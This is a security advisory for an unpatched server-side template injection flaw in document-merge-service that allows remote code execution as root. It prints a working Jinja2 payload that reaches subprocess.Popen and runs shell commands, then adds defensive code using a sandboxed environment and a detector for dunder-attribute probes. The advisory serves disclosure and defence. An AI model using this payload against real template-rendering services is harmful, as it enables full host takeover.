Headline
GHSA-v5gf-r78h-55q6: document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection
Impact
What kind of vulnerability is it? Who is impacted?
Remote code execution via server-side template injection (SSTI) in the Jinja2 rendering of uploaded documents. The service renders templates as root, so a successful exploit is a full takeover of the host; anyone who can upload and render a document is able to trigger it.
Patches
Has the problem been patched? What versions should users upgrade to?
It has not been patched.
References
Are there any links users can visit to find out more?
- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti
POC
Add the following to a document, upload and render it:
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %}
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}
whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}
uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}
{% endif %}
The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}, then get the index of subprocess.Popen and replace 202 with that.
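The root cause is that untrusted document content is rendered with a plain Jinja2 Environment, which lets a template walk from any context value to arbitrary Python classes via `__class__`, `__mro__` and `__subclasses__`. The defensive counterpart, shown here as an added example that is not code from document-merge-service, is to render uploaded templates with `jinja2.sandbox.SandboxedEnvironment`, which refuses access to underscore-prefixed attributes and raises `SecurityError` on the exact chain the PoC above uses. The block also includes a small pre-render triage heuristic that flags dunder attribute access inside template tags; that heuristic is an assumption of this example, useful for logging and alerting on uploads, not a substitute for the sandbox. The helper names `render` and `find_dunder_probes` and the sample templates are constructed for this example; the service's real rendering entry point is not on the page.

```python
import re

# Sample templates, constructed for this example. SAMPLE_PROBE uses the
# attribute chain from the advisory but only lists classes; it runs no command.
SAMPLE_PROBE = "{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}"
SAMPLE_BENIGN = "Dear {{ recipient }}, your invoice total is {{ total }}."

# Matches the body of a {{ ... }} expression or a {% ... %} statement.
_TAG = re.compile(r"{[{%](.*?)[}%]}", re.S)
# Matches dunder names such as __class__, __mro__, __subclasses__, __globals__.
_DUNDER = re.compile(r"__[A-Za-z_]+__")


def find_dunder_probes(template_text):
    """Return the sorted set of dunder names used inside template tags.

    Heuristic only: a benign merge template has no reason to touch dunder
    attributes, so a non-empty result is a strong signal worth logging and
    rejecting before rendering. It is not a security boundary; the sandbox is.
    """
    found = set()
    for tag in _TAG.finditer(template_text):
        found.update(_DUNDER.findall(tag.group(1)))
    return sorted(found)


def render(template_text, context, sandboxed=True):
    """Render a template, sandboxed by default.

    Returns a dict with "status" in {"rendered", "blocked",
    "jinja2_not_installed"} and "output" holding either the rendered text
    or the SecurityError message. jinja2 is imported lazily so the triage
    helper above still works where jinja2 is absent.
    """
    try:
        import jinja2
        from jinja2.exceptions import SecurityError
        from jinja2.sandbox import SandboxedEnvironment
    except ImportError:
        return {"status": "jinja2_not_installed", "output": None}

    # SandboxedEnvironment.is_safe_attribute rejects attributes starting with
    # "_", so PLACEHOLDER.__class__ yields an unsafe Undefined and the next
    # step in the chain raises SecurityError instead of reaching __mro__.
    env = SandboxedEnvironment() if sandboxed else jinja2.Environment()
    try:
        output = env.from_string(template_text).render(**context)
    except SecurityError as exc:
        return {"status": "blocked", "output": str(exc)}
    return {"status": "rendered", "output": output}


if __name__ == "__main__":
    ctx = {"PLACEHOLDER": "", "recipient": "Alice", "total": "42.00"}
    print("triage:", find_dunder_probes(SAMPLE_PROBE))
    print("sandboxed:", render(SAMPLE_PROBE, ctx))
    print("benign:", render(SAMPLE_BENIGN, ctx))
    # For contrast, the plain Environment resolves __class__ without complaint.
    print("unsandboxed:", render("{{ PLACEHOLDER.__class__ }}", ctx, sandboxed=False))
```

A plain `Environment` renders `{{ PLACEHOLDER.__class__ }}` as `<class 'str'>` and lets the rest of the chain through; the sandboxed render of the same template stops with a `SecurityError` whose message names the unsafe attribute, which is the value to surface in logs. Keep the triage check in addition to the sandbox, because it fires at upload time, before any rendering happens, and gives a clean signal for alerting on attempted probes.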
References
- GHSA-v5gf-r78h-55q6